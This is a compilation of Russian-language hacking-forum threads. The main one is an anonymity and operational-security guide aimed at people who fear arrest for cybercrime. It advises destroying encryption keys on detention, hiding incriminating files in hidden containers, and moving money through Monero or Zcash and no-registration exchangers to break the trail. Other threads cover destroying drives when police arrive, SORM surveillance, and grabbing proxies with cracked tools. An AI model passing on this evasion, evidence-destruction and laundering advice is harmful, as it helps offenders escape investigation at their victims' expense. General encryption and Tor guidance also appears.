Зашифровал диск| Ты молодец, улик про тебя куда меньше чем могло бы быть и с хорошим адвокатом, у тебя есть шанс выйти| Ты выдаешь ключи и оказываешься той же ситуации что и с дешифрованным диском
Не зашифровал| Они выуживают все возможные логи, и кроме того что ты 100% садишься, так еще и напарников подставишь| А я тебе говорил, не стоило так наглеть

Можно просо рассмотреть ситуацию Как ты можешь увидеть из таблицы, зашифрованный диск в любой ситуации лучше незашифрованного. А во вторых можно настроить систему так, что уничтожив хотя бы пару кбит(например уничтожив microsd), уже никто даже ты не сможет данные получить. И к стати Сноуден так и поступил, и как видите ФСБ его не «запытала», хотя он обладает куда более ценной информацией чем все хакеры вместе взятые. Можете почитать его воспоминания, во время первой вербовки он сразу сказал, что повредил данные так, что их уже никто никогда не сможет расшифровать, и все, от него сразу отстали.
Хорошо, скажешь ты, зашифрую я данные, но зачем мне шифровать весь диск, почему бы не спрятать только секретные файлы? Но это тоже не очень хорошая идея, хотя лучше чем полное отсутствие шифрования. Кроме того что атакующий может сказать какая ОС (а это тоже иногда хорошо бы скрыть)/программы у тебя стоят. Вся проблема в том, что ни одна ОС не разрабатывалась самого начала для анонимности и все они [текут](https://github.com/QubesOS/qubes- issues/issues/4972). В смысле что все логи отключить не так уж и просто, да и некоторые сторонние приложения (например оконные менеджеры в линуксе), могут записывать имена отрытых программ, сайтов, и хранить многие другие метаданные. Такая система может послужить отличным косвенным доказательством. Да и такая система уязвима перед куда большим количеством атак, например атака «злой горничной».
Это будет тормозить систему, если вы сидите не на нетбуке 10 летней давности то скорее всего не будет, у веракрита есть бенчмарки.
Итог: если ты хотя бы что то хочешь скрыть, шифруй диск полностью. Заметь, что большинство сидит как раз из за того что ничего не шифровали.
Надеюсь я убедил вас использовать полно дисковое шифрование, а теперь я расскажу как это лучше всего сделать. В принципе хитрить с настройками как советовали в статье Хакер, не стоит, добавление 1 нового символа в пароль куда надежнее. Итак для винды используйте veracrypt, AES шифрование, хэш sha-512, pim не трогайте.![](/proxy.php?image=https%3A%2F%2Fwd-x.ru%2Fwp- content%2Fuploads%2F2015%2F07%2F2.Veracrypt.jpg&hash=6fa8ed5f5d26d1eed557882a43912b0b) Если линукс то к сожалению дефолтный вариант не очень хорош. Там используется AES-128. Конечно на данный момент это надежно, и никто ничего взломать не сможет. Но если вы разберетесь как это шифрование работает, то поймете, что с каждым годом надежность будет слабеть. Так например если вы в 90-х шифровали диски с рекомендуемой битностью, то сейчас его уже возможно взломать банальным брутфорсом, хотя уязвимостей в алгоритмах шифрования так и не нашили. А диски то будут храниться на складах и ждать своего часа О том как настраивать LUKS можно прочитать тут. Ничего сложного нет, в принципе можно поставить те же настройки что и стоят по умолчанию в veracrypt.
Ладно, наконец то мы с этим справились, и сидим уже на шифрованной системе, ну все теперь уж точно мы в безопасности) Конечно это не так, мы не рассказали о самом важном, о пароле. Вот англоязычная статья, тут подробно рассказано, что такое надежный пароль. То есть нам нужен пароль с «случайностью» 200+ бит, чтобы он был защищен от атак квантовым компьютером. Но как запомнить вот такой «RI:#¤I*¤&âÊÿ®7Ðþç£@õªß.·#·BTäø3Y¹’¦w» пароль спросишь ты, кончено такой пароль запомнить практически невозможно. Однако очень хорошо что есть такая вещь как парольная фраза она будет выглядеть вот так «setting mumble decibel victory pureblood onyx pregnancy swooned elevate relative corroding video amulet bucked underpay curse vitally epidermal emission earthly» И ее уже запомнить гараздо проще, если вы не знаете английский, то можно сгенерировать такую фразу самому, возьми пару книг у себя дома(хорошо бы не электронных), потом с помощью рандомайзера(кубика) выбираешь одну из них. Потом аналогично выбираешь страницу, потом строку, слово (бери то что по длине больше 4 букв, а не местоимения). Повтори эту процедуру 20 раз и у тебя будет супер надежный пароль, главное не используй его больше нигде кроме как ключа от всей системы и смотри чтобы не видел как ты его вводишь.
Так как запомнить такой длинный пароль, на самом деле стоит просто записать его на бумажку(о ужас) и вводить его по ней, через пару недель он сам запомниться. Главное чтобы кроме тебя никто его не увидел, и после этого ты его ее уничтожил(а не просто в выкину в мусорку) Предупреждение не снимай его на телефон.
К стати если ты его не запишешь, то 100% сразу забудешь и потеряешь доступ ко всем данным, и придётся заново переустанавливать систему)
В принципе 15+ слов нужно только ради защиты от квантовых компьютеров в принципе пароль в 7-10 слов тоже подойдёт, если ты не беспокоишься что данные всплывут через 10-15 лет. И это конечно в разы лучше чем использовать уже известный тебе пароль или вообще без него. К стати со временем ты запомнишь расположение клавиш и начнешь пароль вводить куда быстрее, на рефлексах.
Что же еще можно сделать чтобы еще лучше защититься? Добавь ключ файл и вынеси загрузочный раздел на sd карту и носи ее всегда собой, это к стати и есть защита от атаки «злой горничной» которая в твое отсутсвтие может с флешки загрузиться в твоем ноутбуке(это не так актуально для стационарных пк) и встроить туда вирус, программным способом украсть твой пароль от шифрования) А защиту от физических кейлогеров практически невозможно защититься с помощью программ. Тут уже нужно думать о физической безопасности, но моя статья не об этом.
В общем я надеюсь ты уже не будешь как вот эти люди, и не сядешь по такой глупой ошибки.

Ну ладно мы рассмотрели то что универсально необходимо вообще всем, но теперь узнаем как все таки не спалиться по глупости как например вот эти люди:
Психология анонимуса
Как я уже заметил, не стоит настраивать систему чем больше защиты тем лучше, везде должна быть баланс. Сложная, неудобная, медленная, но анонимная система, вам когда нибудь надоест. И вы например кода вы вводите опять этот супер длинный, супер надежный пароль, скажете себе, да ладно просто оставлю его включенным. Это ошибка! Тут вам стоит очень серьезно подумать, о том, чтобы сделать пароль покороче, ведь хотя бы какой то пароль, куда лучше никогда не выключаемого компьютера, но с очень надежным. Надо понимать, что брать вас будут не тогда когда вы за пк и ясно мыслите.
Теперь я расскажу про ошибку, которую совершали очень многие причем из совсем не глупых людей. А все просто они использовали одни и те же или схожие(подробнее будет в главе про ИИ) логины и пароли. Так выходили на их аккаунты, на которых они еще не скрывались и вычисляли их. Ведь когда они начинали работать и подумать во что это все выльется. Тут уместно будет напомнить, почему генератор данных(логины, пароли, дата рождения и тд) куда лучше придуманных. Все на самом деле достаточно просто. Сомневаюсь, что вы например укажите свой реальный год рождения, и по сути уже можно сказать что вам точно не X лет. А сгенерировав данные о вас ничего сказать нельзя. Как же запомнить столько разных данных, тут вам на помощь придет keepassxc, очень хороший менеджер паролей. И он нам еще поможет для разделения наших интернет ролей. К стати, вы надеюсь догадываетесь, что использовав один и тот же пароль, пароль вида kakoito_password:maska виден сайту на котором вы реггеструйтесь, и с помощью него можно будет понять, что эти два абсолютно разных аккаунта на самом деле один и тот же человек.
В общем при регистрации используем сгенерированные данные, временные почты, ничего не запоминаем, записываем в keepassxc, по ненадобности УДАЛЯЕМ записи.
Почему так важно разделять интернет роли и рвать социальные графы, мы подробнее поговорим в разделе про ИИ(да опять он).
Совет! Меняйте аккаунты, чем меньше о вас инфы есть о акаунте, тем сложнее его будет связать его с вашим вторым.
Совет! Оставляйте как можно меньше информации, не добовляйте например аватарки
А пока скажем про то что стоит очень жестко делить белый трафик(тот что привязан к вам, вашим немпромитирующих интересов, и то что вы пытаетесь скрыть, вот прям чуть ли не вчера(для меня), появилась новость, просто перепутал почты, и прервалась эта 5 летняя эпопея. Для того это бы такого с вами не случилось, лучше всего физически разделить оборудование для работы и для развлечения(в частности мышки, клавиатуры, мониторы). Если у вас такой возможности нету, то можете поставить qubes os, о которой пойдет реч в следующей главе. Либо работать и развлекаться из под разных OS, или учетных записей, но вам просто категорически противопоказанно использовать одни и те же программы. Так же максимально кастомизируйте эти учетки так, чтобы они вообще друг на друга не походили, меняйте обои, темы и тд.
К стати и тут нам поможет keepassxc, просто разделите эти учетки с помощью разных файлов с паролями, и настройте систему так чтобы нельзя было случайно открыть «не тот». В итоге вы даже помнить не будите свои логины/пароли и поэтому не сможете случайно спалиться.
Готовьтесь к худшему, подготовьтесь к задержанию, узнайте как оно происходит, как себя при нем вести, номер хорошего адвоката, деньги на него. К стати можете, кого-нибудь из них, работающих на какие нибудь фирмы, на которых происходили атаки спросить как происходит захват и анализ техники. Такой информацией будут скорее всего обладать, например антирейдеры.
Очень важно, то что вы иногда читаете, как настроить это приложение для анонимной работы, узнаете что течет dns записи, версия ос, имя учетки из сообщений на форуме. А на самом деле все это написано либо в документации к нему, либо на гитхабе/редите/сайте whinix/ qubes/ riseup и тд.

Spoiler: Разоблачение секты анонимных vpn и остальных сервисов дарк тематики.

Не хочу повторяться в общем достаточно грамотно все расписанное уже расписанно тут https://********.io/threads/pochemu-vpn-govno-a-ne- anonimnost.16980/page-2?bdf=1
Почему же анонимность не по архитектуре так плоха. Просто почитайте новости, единственный что я смогу вспомнить, когда на серверах не оказалось никакой инфы, это почтовый сервер lababit. А сколько новостей, что накрыли очередной сервис и оказалось что он хранит все логи за 10 лет? Да миллион таких случаем, зачем им за тебя сидить, если они логи сольют и их под удо выпустят?
Итог: все услуги в дарк тематике со статистической погрешностью нужно считать за ханипот.(То есть все vpn, vps, акки, джаббер сервера, дебетовые карты, сервисы по обналу, закладки с деньгами(что им мешает запомнить номера купюр, к стати в сша так и делают)) Единственное что может вам пригодиться это абузоустойчивость. Но ни о каком доверии к владельцем серверов испытывать категорически не стоит.
P.S. К стати ни vpn, ни прокси, ни vps, ни что либо еще кроме tor(грубо говоря) не может вам дать анонимности, лишь псеводоанонимность, почему? Просо прочитай определения этих слов.
Раз уж рассказал про коммерческие vpn, хочу вас огорчить, но ваш личный сервер ничем принципиально не лучше(логи у провайдера остаются). + ваш социальных граф построить еще проще.

К стати, а ты читал документацию к tor browser, а спецификацию сети, слышал про фингерпринты трафика сайтов, которые текут даже через тор не говоря уж про vpn/ssh? Нет, а стоило бы. Всегда стоит понимать, хотя бы на самом элементарном уровне как работают те или иные технологии. Это реально начинает помогать, понимаешь чего стоит ожидать, а чего нет.
В общем ЧИТАЙ всю документацию, баг репорты на форумах и тд, что сможешь найти к софту котором ты пользуешься, могут выплать много неприятных сюрпризов, ну и поймешь чего на сам деле происходит с этой программой.
Нубский совет для всех, даже не переживающих за свою анонимность, всегда убирайте галочки с согласием на сбор анонимной статистики (на самом деле это не так, даже если они честно не пишут ваш id). Хотя бы просмотрите основные настройки. Если вы пользуйтесь виндой, нужно вырезать телемитрию Используйте его! Прямо сейчас) Посмотри не делиться ли ваши приложения «анонимной статистикой».
ИСПОЛЬЗУЙТЕ TOR
Один из самых важных советов, все мифы о торе развинчиваются, на их официальном сайте, все статьи сравнивающие vpn с tor заказные не доверяйте им, в них полно бреда. Итог: читай документацию к tor browser и наслаждайся анонимностью.
Ну и теперь чтобы не было обидно что тем кто и так все это знал, парочку коротких советов, после чего я вам скину ссылки откуда стоит брать инфу, откуда узнавать то что там не написано.
*расчитываю что вы работаете на whonix-ws
Анонимные деньги:
Многие уже слышали что bitcoin не анонимен, но так же стоит учесть что его везде принимают, и он гораздо мение подозрителен чем анонимные криптовалюты, с помощью этой схемы например можно оплачивать сервера.
В денежной цепочке обязательно должны быть анонимные криптовалюты, причем после этого деньги не становяться белыми.
zcash лучше чем monero, но у для работы с ним нужно качать около 100 ГБ данных, в общем синхронизация через tor займет не один день, а у монеро есть удаленные ноды, синхронизация достаточно быстрая.
!онлайн кошильки не анонимны, только десктопные приложения ЧИТАЙТЕ ДОКУМЕНТАЦИЮ
Что делать если продавец не принимает monero/zcash, просто закинь ему деньги через обменник комиссия всего около 0.5%
(в качестве вывода просто выбери его кошелек на обменники, и меняй monero/zcash -> all, разумеется без регистрации и через tor с выключенными js).
Таким образов вы будите анонимными, но продавец нет, его можно найти. Он становться слабым звеном, следите о том что он о вас знает.
Настройки tor:
Очень не рекомендуется работать с полностью включёнными js, хотя бы с безопасностью safer, к стати вы знали, что в tor browser время js работает криво, что мешает провести множество атак для определения ваших следов. Так например Кача гугла имеет кучу САМЫХ ПЕРЕДОВЫХ жучков, хотя и слишком беспокоиться не стоит, тор все равно анонимен.
Работа без гаранта:
Если не хотите афишировать гаранта о прохождении сделки, воспользуйтесь залогом денег с двух стторон. https://habr.com/ru/post/245791/
Если вы уже включили полное шифрование диска
Прячте файлы за которые вам может прилететь/особо прилететь в скрытых контейнерах, aes - по умолчанию, так что выбираем шифрование без него в цепочке, чем больше разных алгоритмов, тем больше шанс, что взломать контейнер получиться только с помощью брутфорса. В принципе и так все надежно, но если файлы небольшие(сурсы, файл с паролями), то скорость и не нужна. Как только нужные файлы открыли, отмаршируем диск, и даже если вас поймают в момент с расшифрованными основными дисками, самой ценной инфой они так и не завладеют.
К стати часто возникает вопрос как скрыть криптоконтейнер, смотря от кого, от профи не получиться, а так можно замаскировать под побитый архив. Но, у них будет разная энтропия, если открыть их в редакторе, то многие файлы имеют особый формат. А не просто набор случайных битов, как у криптоконтейнеров.
Анонимный месседжер, разоблачение jabber
На самом деле с меседжерами дело обстаит плохо, в частности даже если вы все зашифровали сервера знают социальный граф и другие метаданные, то есть вы опять получите псевдо анонимность место анонимности.(BitMessage в этом плане лучше, но это не чат) Даже если ты анонимен, то можно сделать то же но уже с твоими собеседниками. Что делать? Используй одноразовые аккаунты jabber, лучше с двух сторон, лучше на одном и том же сервере, ведь иначе одной и той же инфой будут владеть уже 2 сервера, твой и твоего собеседника, вероятность утечки выше) Опять же одноразовые акции + tor + шифрование сообщений = можно использовать любой сервер
(однако все равно используй сервисы разрешающие tor, и хорошо бы чтобы они были бесплатными и они хотя бы заявляли что ничего не выдают, есть вероятность что тогда метаданные не попадут пратвнику, их нужно выбирать в зависимости от того от кого защищаешься)

Как же нам самим разобраться в этом вопросе?
Читаем https://2019.www.torproject.org/docs/documentation

trac.torproject.org

[ The Tor Project / Organization

](https://trac.torproject.org/projects/tor/wiki)

This project holds THE wiki for Tor.

trac.torproject.org

[ TracGuide · Wiki · Legacy / Trac

](https://trac.torproject.org/projects/tor/wiki/TracGuide)

Welcome to The Tor Project's Gitlab

trac.torproject.org

Все теперь умнеем, и ищем в инете инфу через tor
Нужно определиться от кого защищаемся, что защищаем и тд
Смотрим перевод либо курс в оригинале «Полный курс по кибербезопасности: Секреты хакеров!»
Смоделируй свои угрозы, оцени риски, например интернет угрозы АНБ, физические угрозы ФСБ, хотят вычислить эти и эти аккаунты на форумах и тд Последствие очень серьезные)
https://www.whonix.org/wiki/Documentation - читаем все от начала до конца, переходим по всем интересным ссылкам, разбираемся, запоминаем, все написано простым языком.
https://forums.whonix.org/ - тоже читаем, много чего интересного тут есть, тут можно задать вопросы
Перед тем как задавать вопрос читай <http://www.catb.org/esr/faqs/smart- questions.html> и https://www.whonix.org/wiki/Forum_Best_Practices
Тут тоже можно задать вопрос https://www.reddit.com/r/Whonix/

В следующей статье рассмотрю эту OC, что, зачем, почему только она подходит для людей серьезно обеспокоенных своей безопасностью и анонимностью.
Если совсем кратко, пользоваться немного труднее чем обычным линуксом, но придется читать документацию. Нужен не слабый пк.
Можете меня не ждать и после того как прочитаете инфу выше начать разбираться в этом

![www.qubes-os.org](/proxy.php?image=https%3A%2F%2Fwww.qubes- os.org%2Fattachment%2Ficons%2Fqubes-logo-icon-name-slogan- fb.png&hash=259b369794a6ee852b781abc2afb93fc&return_error=1)

[ Qubes OS: A reasonably secure operating system ](https://www.qubes-

os.org/)

Qubes is a security-oriented, free and open-source operating system for personal computers that allows you to securely compartmentalize your digital life.

![www.qubes-os.org](/proxy.php?image=https%3A%2F%2Fwww.qubes- os.org%2Fattachment%2Ficons%2F512x512%2Fapps%2Fqubes-logo- icon.png&hash=5cf6795d8623989555c9129d2d27ac0a&return_error=1) www.qubes- os.org

https://www.reddit.com/r/Qubes/ - можно задавать вопросы
https://github.com/QubesOS - тоже стоит прочитать

К стати стоит хотя бы разобраться как работают различные виды шифрования, ну на примитивном уровне, математику понимать не обязательно.
Ну и обещанное, что делать если не нашел нужной информации на этих ресурсах, ищи в научных статьях.

Единый тред посвященный массовой слежке в интернете: СОРМ, PRISM BREAK, 5,9,14 eyes и т.д.

ID: 676533bbb4103b69df371d29
Thread ID: 27282
Created: 2019-01-14T05:04:15+0000
Last Post: 2019-09-19T18:33:42+0000
Author: hsee
Replies: 31 Views: 10K

Доброго времени суток, пользователи XSS.
Заметил что ваш форум не получает той активности, что заслуживает, на мой взгляд.
Решил подогреть интерес новичков и старичков. Раньше (2010-2013) я активно сидел на парочке форумов, правда тематика была немного другая, но тоже связанная с IT, ничего темного, даже серого, обычная белизна. Так вот я вспоминаю с чувством ностальгии те ламповые времена, частичо оставшийся Web 2.0 в ру сегменте, олдскульное оформление форумов, жаркие обсуждения, местные шутки и «герои», в общем хорошее было время. Так почему бы это не возродить? Хотя бы на чуть-чуть.

Предлагаю ИТТ делиться и обсуждать методы слежке в интернете.
Любые сведенья, будь то публичные данные, инсайд информация или даже слухи (но подкрепленные чем-то и подписанные как «Слухи» или «Брат работает в #Операторнейм»). РФ пользователей думаю больше всего интересует работа и устройство СОРМ, давайте сосредоточемся на нем, а если быть точнее на 3 его версии, если мне не изменяет память именно СОРМ3 — о слежке в инете, DPI и все такое.
Выдвигаю так же предложения использовать какие-то анонимные Pad'ы, по типу: EtherPad, куда можно будет собирать всю информацию, думаю лучше всего этот вопрос вынести на голосование.
В общем хочу создать такую публичную базу знаний, для себя, для пользователей и потомков.

От меня несколько тем и вопросов, которые меня интересуют:

Интернет провайдеры: как работают, как выполняют приказы, как и какие логи ведут, IX (точки обмена трафиком), какое оборудование используют, как фильтруют трафик (DPI), как блокируют сайты (заглушки, DPI - в Китае, например и т.д.), белые и серые IP у мобильных операторов, устройство и работа NAT.
СОРМ3 какое используется оборудование, любые подробности, документы, статьи и т.д.
Более подробно о DPI, как его обходить, обфускация трафика и.д.

Интересующие вас вопросы по слежке пишите в теме или в ЛС, а я добавлю.

Природа слежки, меня не волнует, как по мне она более чем естественна и закономерна в этом нашем людском мире, как и все остальное: власть и прочие ублюдства. Все от людской природы, в частности пороков. Ну это так, нотка философии и ИМХО.
Избегать слежки или нет дело каждого. Но как она работает должны знать все, #ящитаю.

/thread Устроим жаркое обсуждение?)

Если уже стучат в дверь: как быстро избавиться от HDD/SSD?

ID: 676533bbb4103b69df371d41
Thread ID: 29234
Created: 2019-05-11T16:55:22+0000
Last Post: 2019-07-16T00:56:42+0000
Author: tabac
Replies: 28 Views: 10K

Если уже стучат в дверь: как быстро избавиться от HDD/SSD?

Теперь пришло время поговорить о мерах предосторожности относительно физического доступа к устройствам.

Как быстро уничтожить информацию на флешке, HDD или SSD

Часто информацию проще всего уничтожить, если она рядом. Речь идёт об уничтожении данных с накопителей — USB-флешек, SSD, HDD. Можно уничтожить накопитель в специальном шредере или просто чем-то тяжёлым, но мы расскажем о более изящных решениях.

Различные компании выпускают носители информации, которые получают функцию самоуничтожения прямо из коробки. Решений огромное количество.

Один из самых простых и наглядных примеров — USB-флешка Data Killer и ей подобные. Такое устройство внешне ничем не отличается от других флешек, но внутри есть аккумулятор. При нажатии на кнопку аккумулятор уничтожает данные на чипе путём сильного нагревания. После этого флешка не распознаётся при подключении, так что уничтожается и сама микросхема. К сожалению, подробные исследования о том, можно ли её восстановить, не проводились.

Есть флешки, которые не хранят никакой информации, но зато могут уничтожить компьютер или ноутбук. Если такую «флешку» положить рядом со своим ноутбуком, и ~~товарищ майор~~ кто-то пожелает быстро проверить, что на ней записано, то она уничтожит и себя, и ноутбук. Вот один из [примеров такого киллера](https://hackaday.com/2017/02/19/the-usb-killer-now-faster-better- more-anonymous/).

Для надёжного уничтожения информации, хранимой на жёстком диске, который находится внутри ПК, есть интересные системы.

Ранее они описывались на Хабре, но не упомянуть о них нельзя. Такие системы оснащены автономным питанием (то есть выключение электричества в здании не поможет остановить уничтожение данных). Есть и таймер на отключение электричества, который поможет, если компьютер изымают в отсутствие пользователя. Даже радио и GSM-каналы в наличии, так что уничтожение информации можно запустить удалённо. Уничтожается она путём генерации девайсом магнитного поля 450 кА/м.

С SSD так не получится, и для них как-то раз предложили вариант термического уничтожения.

Выше — кустарный метод, который ненадежён и опасен. Для SSD используются устройства иного типа, например, Импульс-SSD, уничтожающий накопитель напряжением в 20 000 В.

Стирается информация, трескаются микросхемы, накопитель приходит в полную негодность. Есть варианты и с дистанционным уничтожением (по GSM).

Продаются и механические уничтожители HDD. В частности, такой девайс выпускает LG — это CrushBox.

Вариантов гаджетов по уничтожению HDD и SSD много: они выпускаются как в РФ, так и за рубежом. Предлагаем обсудить такие устройства в комментариях — вероятно, многие читатели могут привести собственный пример.

Как защитить свой ПК или ноутбук

Как и в случае с HDD и SSD, есть много разновидностей систем защиты ноутбуков. Один из самых надёжных — шифрование всего и вся, причём таким образом, чтобы после нескольких попыток добраться до информации данные уничтожались.

Одна из самых известных систем защиты ПК и ноутбуков разработана компанией Intel. Технология называется Anti-Theft. Правда, её поддержка была прекращена несколько лет назад, так что это решение нельзя назвать новым, но в качестве примера защиты оно подходит. Anti-Theft давала возможность обнаружить украденный или потерянный ноутбук и заблокировать его. На сайте Intel говорилось, что система обеспечивает защиту конфиденциальной информации, блокирует доступ к зашифрованным данным и предотвращает загрузку ОС в случае несанкционированной попытки включить устройство.

Эта и похожие на неё системы проверяют ноутбук на наличие таких признаков стороннего вмешательства, как слишком большое количество попыток входа в систему, сбой при попытке входа на заданный ранее сервер, блокирование ноутбука через интернет.

Anti-Theft блокирует доступ к набору микросхем системной логики Intel, в результате чего вход в службы ноутбука, запуск ПО или ОС будет невозможным даже в случае замены или переформатирования HDD или SDD. Также удаляются основные криптографические файлы, которые нужны для доступа к данным.

Если ноутбук возвращается к владельцу, тот может быстро восстановить его работоспособность.

Есть вариант с использованием смарт-карт или аппаратных токенов — в этом случае в систему нельзя войти без таких устройств. Но в нашем случае (если в двери уже стучат) нужно установить еще и PIN, чтобы при подключении ключа ПК запрашивал дополнительный пароль. Пока блокиратор такого типа не подключён к системе, её почти невозможно запустить.

Работающий и сейчас вариант — написанный на Python скрипт USBKill. Он позволяет привести ноутбук или ПК негодность, если неожиданно изменяются какие-то параметры запуска. Его создал разработчик Hephaest0s, опубликовав скрипт на GitHub.

Единственное условие для работы USBKill — необходимость шифрования системного накопителя ноутбука или ПК, включая такие средства, как Windows BitLocker, Apple FileVault или Linux LUKS. Для активации USBKill есть несколько способов, в том числе подключение или отключение флешки.

Ещё один вариант — это ноутбуки с интегрированной системой самоуничтожения. Один такой в 2017 году получили военные РФ. Для уничтожения данных вместе с носителем нужно просто нажать на кнопку. В принципе, аналогичную кустарную систему можно сделать самому или приобрести в сети — их немало.

Один из примеров — [мини-ПК Orwl](https://www.zdnet.com/article/secure-pc- self-destruct-data-tampered-with/), который может работать под управлением различных ОС и самоуничтожается при обнаружении атаки. Правда, ценник негуманный — $1699.

Блокируем и шифруем данные на смартфонах

На смартфонах под управлением iOS есть возможность стереть данные в случае многократных неудачных попыток авторизации. Эта функция штатная и включается в настройках.

Один из наших сотрудников обнаружил интересную особенность iOS-устройств: если необходимо быстро заблокировать тот же iPhone, достаточно пять раз подряд нажать на кнопку включения. В этом случае запускается режим экстренного вызова, и пользователь не сможет получить доступ к устройству по Touch или FaceID — только по код-паролю.

На Android также есть разные штатные функции защиты персональных данных (шифрование, многофакторная аутентификация для разных сервисов, графические пароли, FRP и так далее).

Из несложных лайфхаков относительно блокирования телефона можно предложить использовать отпечаток, например, безымянного пальца или мизинца. В том случае, если кто-то станет заставлять пользователя прикладывать большой палец к сенсору, после нескольких попыток телефон будет заблокирован.

Правда, для iPhone и Android существуют программно-аппаратные комплексы, которые позволяют обойти практически любую защиту. Apple предусмотрела возможность отключения Lightning-разъёма при неактивности пользователя в течение определённого времени, но помогает ли это от взлома телефона при помощи указанных комплексов, неясно.

Некоторые производители выпускают телефоны, которые защищены от прослушки и взлома, но на 100% надёжными их назвать нельзя. Создатель Android Энди Рубин два года назад выпустил телефон Essential Phone, который был назван разработчиками «самым защищенным». Но он так и не стал популярным. Плюс практически не подлежал ремонту: если телефон ломался, то на нём можно было ставить крест.

Безопасные телефоны также выпускались компаниям Sirin Labs и Silent Cirlce. Гаджеты назывались Solarin и Blackphone. Компания Boeing создала Boeing Black — девайс, который рекомендуют сотрудникам оборонных ведомств. У этого гаджета есть режим самоуничтожения, который активируется в случае взлома.

Как бы там ни было, со смартфонами в плане защиты от вмешательства стороннего лица всё обстоит несколько хуже, чем с носителями информации или ноутбуками. Единственное, что можно порекомендовать — не использовать смартфон для обмена и хранения чувствительной информации.

А что делать в общественном месте?

До настоящего момента мы говорили о том, как быстро уничтожить информацию, если кто-то стучится в дверь, а гостей вы не ждали. Но ведь есть ещё и общественные места — кафе, рестораны быстрого питания, улица. Если кто-то подойдёт со спины и заберёт ноутбук, то системы уничтожения данных не помогут. И сколько бы секретных кнопок ни было, со связанными руками нажать их не получится.

Самое простое — вообще не брать гаджеты с критически важной информацией на улицу. Если брать, то не снимать блокировку с устройства в людном месте без крайней необходимости. Как раз в этот момент, находясь в толпе, гаджет можно без проблем перехватить.

Чем больше устройств, тем проще перехватить хоть что-то. Поэтому вместо связки «смартфон + ноутбук + планшет» стоит использовать только нетбук, например, с Linux на борту. Звонить с его помощью можно, а информацию на одном гаджете проще защитить, чем данные сразу на трёх устройствах.

В общественном месте вроде кафе стоит выбирать место с широким углом обзора, и лучше сидеть спиной к стене. В этом случае можно будет видеть всех, кто приближается. В подозрительной ситуации блокируем ноутбук или телефон и ожидаем развития событий.

Блокировку можно настроить для разных ОС, и проще всего это сделать при нажатии на определённое сочетание клавиш (для Windows это системная кнопка + L, нажать можно за долю секунды). У MacOS это Command + Control + Q. Нажимается тоже быстро, особенно если потренироваться.

Конечно, в непредвиденных ситуациях можно и промахнуться, поэтому есть ещё один вариант — блокировка устройства при нажатии на несколько любых клавиш одновременно (удар кулаком по клавиатуре как вариант). Если вы знаете приложение, которое это умеет, для MacOS, Windows или Linux — поделитесь ссылкой.

В MacBook также есть гироскоп. Можно предусмотреть сценарий, когда ноутбук блокируется при поднятии устройства или внезапном быстром изменении его положения по данным встроенного гироскопического датчика.

Соответствующей утилиты мы не нашли, но если кто-то знает о таких приложениях, расскажите о них в комментариях. Если их нет, то мы предлагаем написать утилиту, за которую подарим автору многолетнюю подписку на наш VPN (в зависимости от её сложности, функциональности) и поспособствуем распространению утилиты.

Ещё один вариант — закрыть свой экран (ноутбука, телефона, планшета) от чужих любопытных глаз. Для этого идеально подходят так называемые «фильтры конфиденциальности» — специальные плёнки, затемняющие дисплей при изменении угла просмотра. Увидеть, что делает пользователь, можно только со спины.

Кстати, простой лайфхак на злобу дня: если вы всё же находитесь дома, а в дверь стучат или звонят (курьер принес пиццу, например), то гаджеты лучше заблокировать. Просто на всякий случай.

Защититься от «товарища майора», то есть от внезапной попытки внешней стороны получить доступ к личным данным, можно, но сложно. Если у вас есть собственные кейсы, которыми вы можете поделиться, очень ждём примеров в комментариях.

Паранойя

ID: 676533bbb4103b69df371d75
Thread ID: 26878
Created: 2018-12-13T17:11:49+0000
Last Post: 2019-01-31T20:03:23+0000
Author: deadinside
Replies: 41 Views: 10K

Интересно ваше мнение, было ли у кого что-то подобное.
Вкратце, недавно начал знакомиться с тем как работает интернет в целом.
И понимал что каждый мой цифровой след записывается, недавно ещё посмотрел как сотрудники СОБР скручивают людей, за их тёмные деяния.
Так же узнал про программу СОРМ1,2,3. П*здец товарищи,очень страшно.
Может быть я ПАРАНО́ИК?

p.s Админ, если не в туда написал извини.

Как вы обеспечиваете свою анонимность в сети

ID: 676533bbb4103b69df371dac
Thread ID: 3610
Created: 2005-04-23T19:43:34+0000
Last Post: 2013-10-15T19:25:14+0000
Author: X·ė·Ø·n
Replies: 33 Views: 10K

Собсно сабж.
Я "повесдневно" использую прогу Surfnow, которая создает цепочки проксов.
Конечно, анонимность весьма относительная, так как пропалить реальный ип можно, но я не делаю ничего такого чтоб мне надо было прятацца.

Добываем прокси...

ID: 676533bbb4103b69df371dda
Thread ID: 13409
Created: 2006-11-07T16:29:06+0000
Last Post: 2008-10-14T15:27:49+0000
Author: hawk2000
Replies: 11 Views: 10K

Добываем прокси...

Существует несколько способов добывания проксей.

1. Граб.
Для совсем зеленых в этом деле - объясняю: Граб - это автоматический процесс "стягивания" проксей с бесплатных ресурсов.
Для этого дела нам понадобится граббер.
Proxy Grab 0.6 :zns5: Скачать|Download
Урлы1 2 3

Proxy Finder 1.95 (тут есть одна бага. Список надо обрабатывать. Можно через BrutAll) :zns5: [Скачать|Download](http://rapidshare.com/files/4250895/proxy.finder.enterprise.1.95.full.incl.cracked- rev.zip.html)
Proxy Grabber 2
:zns5: [Скачать|Download](http://www.soft32.com/Download/free- trial/Proxy_Grabber/4-64880-1.html)
:zns1: Крэк|Crack

Грабить прокси можно также гуглем. Подробнее об этом здесь

С помощью этих грабберов делаем большой лист (10000-12000) - и чекаем (об этом немного позже)

2. Скан.
Самый долгий, но самый чесный вариант. К тому - же потраченное время окупится в виде быстрых проксей. Подробнее об этом способе:
Смысл в том, чтобы прверять определенный диапазон IP (а к нему и все типы портов) на наличие проксей.
Для этого нам нужен сканнер:
Super Scan :zns5: Скачать|Download
Интерфейс у этой программки достаточно простенький, но лучше немножко всё-таки расскажу
Ip - здесь будем вводить диапазон ip для скаирования
Timeout - здесь выставляются параметры по которым сканер опр. неживые ip, дефолтовые настройки сойдут
Scan type - здесь задаёться тип сканирования
Scan - здесь отображаеться процес сканирования
Также там есть 4 кнопочки:
1)Save - ну тут и оленю понятно, сохранить список
2)Collapse all - закрывает все открытые ветки
3)Expand all - открывает все ветки
4)Prune - Удаляет все ip с закрытыми портами
Speed - задавать скорость сканирования
Configuration - конфиг программы,а точнее настройки портов,о ней немножко поподробнее...
Change/add/delete port info - Этой опцией можно менять/добавлять/удалять инфу и порты...
Helpers apps in right-click menu - здесь можно настроить меню правого клика по ip из Scan,а конкретнее телнет,фтп и веб клиенты
Port list file - указываеться лист с портами,можно создать свой
Select ports - здесь отмечаем порты которые будут сканиться
